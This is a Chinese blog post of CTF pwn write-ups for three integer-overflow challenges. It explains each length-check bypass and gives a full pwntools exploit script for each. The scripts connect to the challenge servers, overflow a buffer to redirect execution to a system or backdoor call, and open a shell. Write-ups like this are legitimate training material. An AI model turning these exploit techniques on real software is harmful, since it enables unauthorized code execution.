pwn 整型溢出


阅读数: 次   
字数统计: 519字   |   阅读时长: 2分

int_overflow 攻防世界
r2t3 BUU
overflow

@TOC

int_overflow 攻防世界

file checksec
在这里插入图片描述
ida32,进入login
在这里插入图片描述
输入一个用户名,再输入一个passwd,都无法直接栈溢出,进入check_passwd
在这里插入图片描述
发现v3是输入passwd的长度,v3是unsigned __int8类型范围是0~255
如果s的长度超过255,会变为(对s长度取模运算)得到的值。而s的长度不能大于0x199(409),取模后 v3>3&&v3<=8 ,所以输入260个字符就可以绕过if
在这里插入图片描述
查字符串可以找到cat flag
在这里插入图片描述
通过交叉引用列表可以找到调用system的地址
在这里插入图片描述

strcpy(dest,s)时进行溢出
在这里插入图片描述
脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#!/usr/bin/env python3
from pwn import*
context(os="linux",arch="i386",log_level="debug")
content=1

def main():
    if content==0:
        io=process("./int_overflow")
    else:
        io=remote("111.200.241.244",41241)
        
    sys_addr=0x08048694
    payload=b'a'*(0x14+4)+p32(sys_addr)
    payload=payload.ljust(260,b'a')
    
    io.sendlineafter("Your choice:",b"1")
    io.sendlineafter("Please input your username:",b"aaaa")
    io.sendlineafter("Please input your passwd:",payload)
    
    io.interactive()
    
main()

r2t3 BUU

file checksec
在这里插入图片描述
ida32
在这里插入图片描述
在这里插入图片描述
和上一题一模一样
脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/usr/bin/env python3
from pwn import*
context(os="linux",arch="i386",log_level="debug")
content=1

def main():
    if content==0:
        io=process("./r2t3")
    else:
        io=remote("node3.buuoj.cn",27337)
        
    sys_addr=0x08048594
    payload=b'a'*(0x11+4)+p32(sys_addr)
    payload=payload.ljust(260,b'a')
    
    io.sendlineafter("[+]Please input your name:",payload)
    io.interactive()
    
main()

overflow

实验室内部的一道题
file checksec
在这里插入图片描述
ida64
在这里插入图片描述
nbytes是unsigned long long型,下面if中强制转换为signed int型(范围变小,导致截断),而在下面read函数中第三个参数仍为size_t型,因此会造成整型溢出漏洞
在这里插入图片描述
在这里插入图片描述
所以我们只需让输入的数%4294967295<30或>2147483647(溢出成负数)即可
找到后门函数
在这里插入图片描述
脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#!/usr/bin/env python3
from pwn import*
context(os="linux",arch="amd64",log_level="debug")
content=1

def main():
    if content==0:
        io=process("./overflow")
    else:
        io=remote("a16ne.cn",10001)
        
    io.recvuntil("Do you have a girlfirend?(No/Yes):")
    io.sendline("Yes")
    
    io.recvuntil("REALLY? WHAT`S HER AGE: ")
    io.sendline('2147483667')
    
    sys_addr=0x400928
    payload=b'a'*(0x30+8)+p64(sys_addr)
    
    io.recvuntil("OH YOU LUCKY DOG~~~~ HER NAME IS ??")
    io.sendline(payload)
    io.interactive()
    
main()




-------------本文结束感谢您的阅读-------------



谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码
本站总访问量 本站访客数人次

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

朱登榜,来自河南郑州,河南大学学生,倘若文章有错误,望提醒修正,感谢!<br>qq:879322660<br>微信:z15981855791